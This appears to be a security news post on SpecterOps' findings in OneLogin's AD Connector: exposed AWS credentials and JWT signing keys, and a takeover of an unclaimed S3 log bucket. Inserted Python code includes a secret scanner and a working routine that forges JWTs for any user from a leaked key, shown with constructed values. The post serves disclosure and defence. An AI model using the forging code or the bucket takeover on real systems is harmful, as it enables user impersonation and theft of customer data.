Cyber Web Spider Blog – News
OneLogin AD Connector Vulnerabilities Exposes Authentication Credentials

Posted on June 12, 2025 by CWS

A security investigation has revealed critical vulnerabilities in OneLogin's Active Directory (AD) Connector service that exposed authentication credentials and enabled attackers to impersonate legitimate users across enterprise environments.

The vulnerabilities, which affect OneLogin's widely used identity and access management platform, demonstrated how threat actors could leverage exposed credentials to generate valid JSON Web Tokens (JWTs) and gain unauthorized access to customer systems.

The flaws emerged from research conducted on OneLogin's trial tenant system, which gives prospective customers access to evaluate the platform's features and functionality.

What began as a routine security assessment quickly escalated when researchers discovered that OneLogin's AD Connector service was inadvertently exposing sensitive authentication material through its API endpoints.

The connector service, deployed as ConnectorService.exe on Windows domain controllers, was found to receive credentials in cleartext through configuration API calls, creating a significant attack surface for malicious actors.

SpecterOps analysts identified several critical exposure points within the OneLogin infrastructure, including cleartext AWS credentials, API keys, and the cryptographic signing keys used to generate JWTs.

The research showed that attackers could use these exposed credentials to craft tokens indistinguishable from legitimate ones, effectively bypassing OneLogin's security controls and impersonating any user synchronized from the directory service.

Lab setup (Source: SpecterOps)

This vulnerability chain demonstrated a complete compromise scenario in which initial credential exposure could lead to widespread unauthorized access across an organization's federated applications.

The impact of these vulnerabilities extends far beyond simple credential theft, because OneLogin serves as a centralized identity provider for numerous enterprise customers.

When compromised, such systems can give attackers broad access across an organization's entire application ecosystem, including cloud services, on-premises applications, and third-party integrations.

The research highlighted how identity federation platforms have become high-value targets because of their central role in modern enterprise security architectures.

Technical Exploitation Mechanism

The exploitation process centered on OneLogin's AD Connector configuration API endpoint, which returned sensitive configuration data when queried with valid directory tokens.

Researchers discovered that this endpoint exposed critical information including API keys, AWS IAM user credentials (AKIA access key IDs and their secrets) in cleartext, and base64-encoded signing keys required to create JWTs.

The exposed AWS credentials led to a particularly concerning finding: when researchers attempted to access the referenced S3 bucket onelogin-adc-logs-production, they discovered that the bucket name was unclaimed.

By registering that bucket name in a personal AWS account, the researchers began receiving production log files from an actual OneLogin customer, containing detailed LDAP properties for all synchronized users along with valid directory tokens.
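The two findings above (secrets returned in a configuration response, and a referenced bucket that nobody owned) are both things a defender can check for mechanically. The following is an added example, not code from the SpecterOps research or from OneLogin: it walks a parsed JSON response and flags AWS access key IDs by their fixed AKIA prefix, base64-looking values under secret-ish field names, and any bucket reference that should be checked for ownership. The response body is a constructed stand-in whose field names and values are invented here; they are not OneLogin's actual schema, and the AKIA/secret pair is the placeholder pair from AWS documentation.

```python
import base64
import json
import re
from typing import Any, Iterator, List, Optional, Tuple

# Value-based detector: AWS access key IDs are "AKIA" + 16 upper-case alphanumerics.
AKIA_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
# Loose shape of base64 key material: 32+ characters of the base64 alphabet.
B64_KEY_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
# Name-based hints: field names that usually carry secrets, or bucket references.
SECRET_NAME_RE = re.compile(r"(secret|key|token|password|credential)", re.I)
BUCKET_NAME_RE = re.compile(r"bucket", re.I)


def walk(obj: Any, path: str = "") -> Iterator[Tuple[str, Any]]:
    """Yield (dotted_path, leaf_value) for every leaf in a parsed JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk(value, f"{path}.{key}" if path else str(key))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from walk(value, f"{path}[{index}]")
    else:
        yield path, obj


def classify(name: str, value: Any) -> Optional[str]:
    """Return a finding kind for one leaf, or None if it looks benign."""
    if not isinstance(value, str):
        return None
    if AKIA_RE.search(value):
        return "aws_access_key_id"
    if BUCKET_NAME_RE.search(name):
        # Not a secret, but an unclaimed bucket name is a takeover target;
        # confirm ownership out of band (aws s3api head-bucket --bucket NAME).
        return "s3_bucket_reference"
    if SECRET_NAME_RE.search(name):
        return "key_material" if B64_KEY_RE.match(value) else "secret_value"
    return None


def find_exposed_secrets(config_json: str) -> List[dict]:
    """Scan a JSON response body and list every field that should never be
    handed to a connector client in cleartext."""
    findings = []
    for path, value in walk(json.loads(config_json)):
        kind = classify(path.rsplit(".", 1)[-1], value)
        if kind:
            findings.append({"path": path, "kind": kind})
    return findings


# Constructed stand-in for a connector configuration response (invented
# field names and placeholder values; not OneLogin's real schema or data).
SAMPLE_CONFIG_RESPONSE = json.dumps({
    "api_key": "0123456789abcdef0123456789abcdef",
    "aws": {
        "access_key_id": "AKIAIOSFODNN7EXAMPLE",
        "secret_access_key": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "region": "us-east-1",
        "log_bucket": "onelogin-adc-logs-production",
    },
    "jwt": {
        "signing_key": base64.b64encode(b"constructed-demo-signing-key-not-real-01").decode(),
    },
    "sync_interval_minutes": 15,
})

if __name__ == "__main__":
    for finding in find_exposed_secrets(SAMPLE_CONFIG_RESPONSE):
        print(f"{finding['kind']:22} {finding['path']}")
```

Run against the constructed response, the scanner reports the API key, both halves of the AWS credential, the signing key, and the bucket reference, and stays silent on the region and the sync interval. The point of the bucket finding is that a name in a config is a claim, not proof of ownership: the research shows what happens when that claim is false.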

JWT tokens (Source: SpecterOps)

This represented a complete breach of customer data confidentiality and highlighted systemic issues in OneLogin's infrastructure management.

The technical exploitation relied heavily on reverse engineering OneLogin's .NET ConnectorService.exe binary to understand how the JWTs are constructed.

Using decompilation tools, the researchers identified the required JWT claims, including expiration time (exp), issuer (iss), audience (aud), and subject (sub).

A Python script was developed to generate valid JWTs using the exposed signing keys, demonstrating the practical exploit capability.

The authentication flow involved posting these crafted tokens to OneLogin's SSO client URL, which bypassed all authentication controls and granted access to federated applications as any impersonated user.
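What the forging step looks like in code, and why a relying party cannot tell a forged token from a real one once the key is out, as an added example that is not the SpecterOps script and not OneLogin's code: the block below mints a token carrying the exp/iss/aud/sub claims named above and then runs it through a verifier of the kind a relying party would use. HMAC-SHA256 (HS256) over the decoded base64 key, and the issuer and audience strings, are assumptions of this example; the signing key and subjects are constructed values.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional


def b64url(data: bytes) -> str:
    """JWT base64url: urlsafe alphabet with the '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def forge_jwt(signing_key_b64: str, sub: str, iss: str, aud: str,
              ttl: int = 300, now: Optional[int] = None) -> str:
    """Mint an HS256 token for any subject from a base64-encoded signing key.

    Assumption of this example: the key is used directly as an HMAC-SHA256
    secret. The claim set is the exp/iss/aud/sub set named in the article."""
    key = base64.b64decode(signing_key_b64)
    now = int(time.time()) if now is None else now
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"iss": iss, "aud": aud, "sub": sub, "iat": now, "exp": now + ttl}
    signing_input = f"{b64url(_compact(header))}.{b64url(_compact(claims))}"
    signature = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(signature)}"


def verify_jwt(token: str, signing_key_b64: str, iss: str, aud: str,
               now: Optional[int] = None) -> Optional[Dict]:
    """Relying-party side: accept a token only if the HMAC checks under the
    shared key and iss/aud/exp are right. Returns the claims, or None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, claims_b64, sig_b64 = parts
    key = base64.b64decode(signing_key_b64)
    expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        return None
    claims = json.loads(b64url_decode(claims_b64))
    now = int(time.time()) if now is None else now
    if claims.get("iss") != iss or claims.get("aud") != aud:
        return None
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    return claims


# Constructed values for the demonstration; none of this is real OneLogin data.
DEMO_KEY_B64 = base64.b64encode(b"constructed-demo-signing-key-not-real-01").decode()
DEMO_ISS = "https://example-tenant.onelogin.invalid"   # hypothetical issuer
DEMO_AUD = "ad-connector"                                 # hypothetical audience


def demo(now: int = 1_700_000_000) -> Dict[str, bool]:
    """Forge a token for an arbitrary subject and show how the verifier treats
    it (accepted), a re-written copy (rejected), and an expired copy (rejected)."""
    token = forge_jwt(DEMO_KEY_B64, "alice@example.invalid", DEMO_ISS, DEMO_AUD, ttl=300, now=now)
    accepted = verify_jwt(token, DEMO_KEY_B64, DEMO_ISS, DEMO_AUD, now=now + 60)

    # Swap the subject without re-signing: the HMAC no longer matches.
    header_b64, _, sig_b64 = token.split(".")
    bogus_claims = b64url(_compact({"sub": "admin@example.invalid"}))
    tampered = verify_jwt(f"{header_b64}.{bogus_claims}.{sig_b64}",
                          DEMO_KEY_B64, DEMO_ISS, DEMO_AUD, now=now + 60)

    expired = verify_jwt(token, DEMO_KEY_B64, DEMO_ISS, DEMO_AUD, now=now + 301)
    return {
        "forged_token_accepted": accepted is not None and accepted["sub"] == "alice@example.invalid",
        "tampered_token_rejected": tampered is None,
        "expired_token_rejected": expired is None,
    }


if __name__ == "__main__":
    print(demo())
```

The verifier does everything a careful relying party should (constant-time signature comparison, pinned algorithm, issuer, audience and expiry checks) and still accepts the forged token, because every check is a function of the key. That is the whole point of the finding: once the signing key leaves the config endpoint, the only remaining defence is rotating it.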

This vulnerability chain represents a critical failure in secure credential management and API design, where a single exposed endpoint could compromise an entire customer's identity infrastructure.

The research underscores the importance of treating identity federation platforms as Tier 0 assets requiring the highest levels of protection and monitoring.
